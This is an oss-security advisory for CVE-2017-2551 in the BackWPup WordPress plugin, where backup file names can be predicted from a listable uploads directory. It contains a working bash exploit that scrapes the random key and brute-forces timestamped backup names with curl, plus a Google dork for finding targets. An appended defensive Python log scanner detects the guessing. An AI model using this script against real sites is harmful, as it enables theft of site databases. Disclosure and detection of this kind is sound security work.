Date: Wed, 27 Sep 2017 12:13:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute
 forcing of backup file download

Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to name the storage directory under wp-content/uploads/, which in most installations of WordPress allows file listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, since the rest of its name is just a date and time stamp. It would take a maximum of 86400 tries to guess whether a backup is available for that day.
Filename format:
backwpup_RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup


Exploit Code:
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup


#Add banner about vulnerability

KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0

echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
        for x in `seq -w 0 59`; do
                # progress: 24*60*60 = 86400 candidate names per day
                Y=`echo "scale=2;($Z/86400)*100"|bc`;
                # carriage return rewrites the progress line in place
                echo -ne "\r$CWPATH $Y%"
                for z in `seq -w 0 59`; do
                        Z=$(( $Z + 1 ));
                        CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
                        RESULT=`curl -s --head $CWPATH|grep 200`;
                        if [ -n "$RESULT" ]; then
                                echo ""
                                echo "[+] Location $CWPATH Found";
                                echo "[+] Received $RESULT";
                                echo "Downloading......";
                                # wget $CWPATH
                                exit;
                        fi;
                done
        done
done
echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup
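A defender-side check to go with the weakness described above, as an added example that is not part of the advisory or the plugin: it scans web-server access logs for the guessing pattern (a fetch of the /wp-content/uploads/ index followed by a run of 404s against backwpup_<key>..._<date>_<HH-MM-SS>.zip names) and reports which clients produced it. The log lines, IP addresses and key value are constructed; the threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format access-log lines (not from the advisory):
# one client lists /wp-content/uploads/ to learn the random key, then walks
# backwpup_<key>01_<date>_<HH-MM-SS>.zip names one second at a time.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Sep/2017:10:00:01 +0000] "GET /wp-content/uploads/ HTTP/1.1" 200 2311 "-" "curl/7.55.0"
203.0.113.7 - - [08/Sep/2017:10:00:02 +0000] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-08_00-00-00.zip HTTP/1.1" 404 0 "-" "curl/7.55.0"
203.0.113.7 - - [08/Sep/2017:10:00:02 +0000] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-08_00-00-01.zip HTTP/1.1" 404 0 "-" "curl/7.55.0"
203.0.113.7 - - [08/Sep/2017:10:00:03 +0000] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-08_00-00-02.zip HTTP/1.1" 404 0 "-" "curl/7.55.0"
198.51.100.9 - - [08/Sep/2017:10:05:00 +0000] "GET /wp-content/uploads/2017/09/photo.jpg HTTP/1.1" 200 84122 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})')
# Backup name shape from the advisory: backwpup_<RANDOMSTRING><NUMBER>_%Y-%m-%d_%H-%i-%s
BACKUP_RE = re.compile(
    r'^/wp-content/uploads/backwpup-[^/]+-backups/'
    r'backwpup_[A-Za-z0-9]+_\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.zip$')
LISTING_RE = re.compile(r'^/wp-content/uploads/?$')

def summarize(log_text):
    """Per client IP: whether it fetched the uploads index, and how many
    backup-name probes missed (non-200) or hit (200)."""
    stats = defaultdict(lambda: {"listing": False, "misses": 0, "hits": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip unparsable lines rather than abort the scan
        ip, path, status = m["ip"], m["path"], m["status"]
        if LISTING_RE.match(path) and status == "200":
            stats[ip]["listing"] = True
        elif BACKUP_RE.match(path):
            stats[ip]["hits" if status == "200" else "misses"] += 1
    return dict(stats)

def find_guessers(log_text, threshold=3):
    """IPs whose missed backup-name probes reach the threshold (assumed value).
    A legitimate admin fetches one known file and never produces a 404 run."""
    return sorted(ip for ip, s in summarize(log_text).items()
                  if s["misses"] >= threshold)

if __name__ == "__main__":
    for ip in find_guessers(SAMPLE_LOG):
        s = summarize(SAMPLE_LOG)[ip]
        print(f"{ip}: listing={s['listing']} misses={s['misses']} hits={s['hits']}")
```

A run of 404s against this name space is the signal; a single 200 on the same path shape from an address that also fetched the directory index means the backup was found and should be treated as exposed.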
